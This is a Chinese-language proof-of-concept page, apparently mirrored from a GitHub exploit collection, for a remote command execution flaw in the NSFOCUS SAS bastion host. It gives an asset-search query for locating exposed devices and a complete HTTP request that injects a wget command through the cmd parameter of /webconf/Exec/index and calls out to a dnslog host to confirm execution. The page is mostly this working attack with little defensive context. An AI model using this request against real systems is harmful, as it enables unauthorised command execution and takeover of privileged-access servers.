admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-08-13 03:16:31 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/绿盟/绿盟SAS堡垒机Exec远程命令执行漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

1.3 KiB
Raw Blame History

绿盟 SAS堡垒机 Exec 远程命令执行漏洞

一、漏洞执行

绿盟 SAS堡垒机 Exec 远程命令执行漏洞,攻击者可通过该漏洞获取服务器控制权限。

二、影响版本

  • 绿盟SAS堡垒机

三、资产测绘

  • hunterapp.name="NSFOCUS 绿盟 SAS"

1692345776559-f5624e5a-4bb4-49a1-891a-79dd9dc6ddce.png

  • 登录页面

1692345819090-b23ee8fd-4a29-497b-a62a-e7957b5cfd88.png

四、漏洞复现

GET /webconf/Exec/index?cmd=wget%200nicnk.dnslog.cn HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: close

1699631390274-e13e84c5-8436-4db2-ac80-05982c2a23f9.png

1699631405537-551fadb6-953b-4d16-af40-dbafadbb5587.png

更新: 2024-02-29 23:57:15
原文: https://www.yuque.com/xiaokp7/ocvun2/yxzz8e5biz6qbl41